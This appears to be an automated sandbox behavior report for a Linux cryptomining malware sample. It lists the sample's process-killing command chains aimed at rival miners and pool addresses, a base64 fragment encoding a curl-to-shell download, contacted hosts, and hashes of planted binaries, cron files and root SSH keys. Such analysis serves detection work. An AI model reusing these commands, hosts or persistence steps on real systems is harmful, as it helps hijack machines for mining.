[grep curl]

/bin/grep

[grep logo9.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep j2.conf]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep luk-cpu]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep luk-cpu]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep ficov]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep ficov]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep he.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep he.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep miner.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep miner.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep nullcrew]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep nullcrew]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 107.174.47.156]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep 83.220.169.247]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.38.203.146]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 144.217.45.45]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 107.174.47.181]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 176.31.6.16]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep mine.moneropool.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep pool.t00ls.ru]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:8080]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:3333]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep [email protected]]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep monerohash.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/a7b104c270]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:6666]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:7777]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:443]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep stratum.f2pool.com:8888]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmrpool.eu]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kieuanilam.me]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xiaoyao]

/bin/ps

[ps auxf]

/usr/local/sbin/kill

[kill -9 1745]

/usr/local/bin/kill

[kill -9 1745]

/usr/sbin/kill

[kill -9 1745]

/usr/bin/kill

[kill -9 1745]

/sbin/kill

[kill -9 1745]

/bin/kill

[kill -9 1745]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xiaoxue]

/bin/ps

[ps auxf]

/usr/local/sbin/kill

[kill -9 1750]

/usr/local/bin/kill

[kill -9 1750]

/usr/sbin/kill

[kill -9 1750]

/usr/bin/kill

[kill -9 1750]

/sbin/kill

[kill -9 1750]

/bin/kill

[kill -9 1750]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $7}]

/bin/sed

[sed -e s/\/.*//g]

/bin/grep

[grep ESTABLISHED\|SYN_SENT]

/bin/grep

[grep 46.243.253.15]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/sed

[sed -e s/\/.*//g]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep ESTABLISHED\|SYN_SENT]

/bin/grep

[grep 176.31.6.16]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f L2Jpbi9iYXN]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f xzpauectgr]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f slxfbkmxtd]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mixtape]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f addnj]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f 200.68.17.196]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f IyEvYmluL3NoCgpzUG]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f KHdnZXQgLXFPLSBodHRw]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mwyumwdbpq.conf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f honvbsasbf.conf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mqdsflm.cf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f lower.sh]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./ppp]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f cryptonight]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./seervceaess]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servceaess]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servceas]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servcesa]

Network

Country Destination Domain Proto
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
NL 45.83.123.29:80 45.83.123.29 tcp

Files

/etc/zzhs

MD5 b026324c6904b2a9cb4b88d6d61c81d1
SHA1 e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA256 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA512 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

/usr/bin/kswaped

MD5 26ab0db90d72e28ad0ba1e22ee510510
SHA1 7448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA256 53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA512 63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

/usr/bin/irqbalanced

MD5 6d7fce9fee471194aa8b5b6e47267f03
SHA1 a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA256 1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA512 2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

/usr/bin/rctlcli

MD5 48a24b70a0b376535542b996af517398
SHA1 9c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA256 7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512 db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

/usr/bin/systemd-network

MD5 1dcca23355272056f04fe8bf20edfce0
SHA1 5d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256 f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA512 29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

/usr/bin/pamdicks

MD5 9ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1 ccf271b7830882da1791852baeca1737fcbe4b90
SHA256 06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512 f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

/etc/zzhs

MD5 970d39f8690eff0fe573e7bcf51bda9b
SHA1 46f8f835d3d3d41f063d0e8346260bb622b01a3f
SHA256 7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5
SHA512 24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

/bin/ps

MD5 3d47b8e895a71930bda5d4f3d8fc8589
SHA1 efbaf468b81abb6b465ca12f35fa067bae1b4f10
SHA256 be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36
SHA512 bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb

/bin/ps

MD5 f668da8f0525cbe5a545869cb5776913
SHA1 996e6afed4498ff8a92a64330de018141af102c9
SHA256 db7a08cba996d62b1fe07727ba58b98d7b59778bd7227c9b7fd69bc587d2557f
SHA512 f918ba58e9af19704344c92ec356d215080f47d66b175f3d712d31e54e1b9e4e46daeb0556d82b0722ae01b8cfe456f08021e73b053ced6326735e1d0b73c700

/bin/top

MD5 6956a4d6a2444151c11a73517215cb34
SHA1 b279ad496f640f44418aa7e5e27a4d458bddb7fb
SHA256 561941bdd6305a389e688a1214acd9163478301738158f13349ea403dfae300c
SHA512 ee1a27243159cf9aa99ed0ff79ae1f6d66c698f668e0c233544f1a79aab5bb8ca6edb051d907aef8b50ff85f39aa41b21e951476c3a53b6a85a7a06adc28ed8d

/bin/pstree

MD5 896f6d504f181bd883a90b84069bcf70
SHA1 86fd682d1932d9e14461796e5f0fe776b8ce9d5c
SHA256 b6eec955fd5b0e9ddf43ef55b7fe74075cc1a935ab896d5cd0a55429ef0d6d25
SHA512 1f705ceead76868a79abb7ea42efad35e37b95421bfc81ce4540e4beeb7cbc0ccadfaae85794b6945c93304da9948d9d63504f9377ca3e92b874cc3f691d3c1a

/etc/cron.d/zzh

MD5 3a615a3d1952b1e2c0cb584bd253f7f9
SHA1 79465a5e611f19f140f169ac5bc3a9ab382696ef
SHA256 ff1d557b85a902fbe4d2d0b0f3e79307f1f7e6dc36c537a824e920c5e8ece2de
SHA512 8819cd4ef33fe59b8618ac7a2f116169b2effeb87f2353b674ef08c8297dbbda75112c5dd882c60b05c9cedeab0aa3dd79e06923b2a2db0cad8a3ec2b6c5532e

/etc/crontab

MD5 b2ecca8d419b5c3fa2ee7621efa75eb7
SHA1 3adc58bd314dea94eebfd1582ffc8bbbb5cfb34e
SHA256 e15357c9d6df46a6b43036e8f646311f88019e587b8d55a8aecfa438cd971545
SHA512 c6a7d05b7f615de3946055be8a4995c0fb8c670fe53c8a8dcba98f32c2ec4cb92a93524aebaca97c9b6e8696b71bdc2114d6ec303bff4ec288745bae15522e69

/root/.ssh/authorized_keys

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

/root/.ssh/authorized_keys

MD5 12bf68ad9999dcbc8bd1d9a728d600aa
SHA1 7f302d2df5e075f879586cb0ab1dcc0b0870cc98
SHA256 cfc3a74939edac785d66664757b3c877a7e5f4fae29b3a5bdf8b55e79573dfb5
SHA512 ef6a8c50fd411622eefae30bfcc962368f355ec897b0136b2290784344ce735c3b3d51feda679e3c42ab524197d6515f1f8699e17598171a1b888b0fbe5229e7

/etc/zzh

MD5 c6d1e3293c17bddaaca25410de6c49fe
SHA1 82a412fcb51a87887e55c8798d111e2b5fd5b96d
SHA256 7dff9504960b180ba4328b80756d0849c690e64fc6879ede5094b6273fe2cd5a
SHA512 6134ca54020e037aca25c6d6e76ef29f73cc8e55058d90882dba38b72e586e73d94b84e4c167661a960b68eb679c408adcae60ca43fa4de9e095d7b2869b6584